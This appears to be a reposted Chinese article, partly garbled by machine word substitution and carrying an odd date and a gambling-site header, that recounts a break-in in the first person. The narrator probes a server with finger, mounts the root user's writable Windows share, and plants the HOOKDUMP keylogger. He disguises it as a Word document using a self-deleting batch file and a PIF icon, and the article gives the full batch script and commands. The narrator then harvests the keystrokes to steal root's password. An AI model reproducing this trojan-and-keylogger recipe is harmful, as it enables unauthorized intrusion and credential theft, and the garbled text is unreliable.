知己知彼 看黑客如何入侵Linux操作系统

  • 时间:
  • 浏览:2
  • 来源:5分快3-5分快乐8平台_5分排列3网投平台





作者: 论坛派发 zdnet网络安全

CNETNews.com.cn

307-12-18 12:40:08

关键词: 攻击防范 黑客 系统安全 Linux

我发现了有兩个网站,于是常规入侵。很好,它的FINGER开着,于是我编了有兩个SHELL,aaa帐号试到zzz(by the way,这是我发现的有兩个网上规律,那以后 帐号的长度与口令的效率单位成正比, 以后有兩个帐号没办法 两三位长,那它的口令一般也很简单,反之亦然,故且称之为若氏定理吧),结果有兩个帐号以后 地处,我没办法 再试它的帐号。以后我被它开的端口吸引住了,它开着WWW,你可否 不信它没办法 了错。一连拿了本身CGI和WWW扫描器总计扫了三四百种常见错误它几乎都不 地处。:( 有十多少 错误,但不知道怎么可否利用,算了。又绕着主机转了几圈,象狐狸遇见刺猬,无从下嘴。

  还是看看root的信息吧:

  finger root@xxx.xxx.xxx

  Login name: root In real life: system PRIVILEGED account

  Directory: / Shell: /bin/sh

  Last login Fri Jul 28 09:21 on ttyp0 from 202.xx.xx.xx

  No Plan.

  root总是来,那个202.xx.xx.xx以后 他用的工作站了,从那会不要 看过点东西呢?

  net view 202.xx.xx.xx

  Shared resources at 202.xx.xx.xx

  Sharename Type Comment

  x

  x

  我的公文包

  The command was completed successfully.

  在上网的机器上开着WINDOWS的“文件和打印机共享”的服务,是好多好多 人容易掉以轻心的,某些root没办法 例外。以后它的C盘共享了某些可写那就好了,但那是做梦,现在开了共享的目录没办法 兩个是根目录,连D驱的都没办法 。别着急,慢慢来。x掉的哪此文件夹都没用,没办法 写,后面 尽是些英文原著,某些root还挺行的。“我的公文包”吸引了我的注意,这是有兩个用于将不同的机器上的资料进行同步的工具,很显然某些root要总是更新主机上的主页,有以后在另一方的机器上编,有以后在主机上编……好多好多 很重要的某些:“我的公文包”的共享一般都不 可写的!

  以后再进去看看。

  >net use i: 202.xx.xx.xx

  >i:

  >echo asdf>temp.txt

  不错,确实可写。

  >del temp.txt

  不留痕迹——黑客的习惯。

  >dir/od/p

看看都不 些哪此…… 倒数第二排那个是哪此?“X月工作计划.doc”!以后 它了,既然是计划就不以后写完了就丢一边,它肯定会再次打开它的——为宜下个月写计划能够 COPY一下:->



该动手了,我的目标以后 让它下次打开时误中我的陷阱而运行我藏的木马。我这次用的是有兩个键盘计录软件HOOKDUMP,我确实它挺好的,价钱实惠,量也足…… 对不起,说习惯了,应该是它不仅记录下完整性击键,还记录下打开或关掉了哪此系统进程运行、按过哪此按纽、用过哪此菜单…… 总之,它的记录你可否 就和你站在他身旁看他操作计算机一样完整性了。您要问没办法 多木马你为甚装某些?要知道无论是中国的冰河、netspy还是外国的netbus、BO,都被各种杀毒软件列为头号侦查对象,而有兩个root的机器上可不以后没装杀毒软件?还是HOOKDUMP好,小小的,不起眼,不过以后另一个人都用只怕我再用它的以后就少了……

  >copy hookdump.* i:

  补充某些:上传前先编好它的hookdump.ini文件,置为隐藏法律依据运行,不然root一运行屏幕上蹦出一大窗口可就……。

  某些再在另一方的机器上编有兩个同名的BAT文件:X月工作计划.BAT

  >edit c:X月工作计划.BAT

  @echo off

  hookdump

  attrib -h X月工作计划.doc

  C:Program FilesMicrosoftOfficeWinword X月工作计划.doc

  attrib -h temp.bat

  del temp.pif

  del temp.bat

  看明白了吧?root运行了某些BAT文件实际上以后 先运行木马,再调用WINWORD文件打开它想开的某些文件,某些自我删除,你说哪此它机器上WINWORD的位置不同,那调用就会失败,不过暂且紧,反正BAT会马上删除,他会以为是另一方的误操作。

  这时你的C驱根目录都不 了没办法 有兩个BAT文件,它是有兩个方形的图标,和那个WORD文件大相径庭,root为甚会运行它呢?没关系,在某些文件上点右键,点属性,在“系统进程运行”栏选“更改图标”不就行好久?WORD的图标在你机器C:Program FilesMicrosoftOffice中。能够 将“运行”改为“最小化”,“退出时关闭”打上勾,过可否 够保证在运行时某些迹象也没办法 。事实上某些BAT文件变成了有兩个,还有兩个PIF文件以后 它的图标。

  把这有兩个文件传上去:

  >copy X月工作计划.bat i:

  >copy X月工作计划.pif i:

  某些把它的文件和另一方的文件都藏起来:

  >attrib +h X月工作计划.doc

  >attrib +h X月工作计划.bat

  以后,root的“公文包”里只剩下有兩个和以后一模一样的WORD图标,他做梦也没想到这已变成了有兩个BAT文件。某些可否 喘口气了,让另一个人静静的等……

  几天后,我进入某些工作站,取下记录下来的击键记录,找出root的口令,进入主机。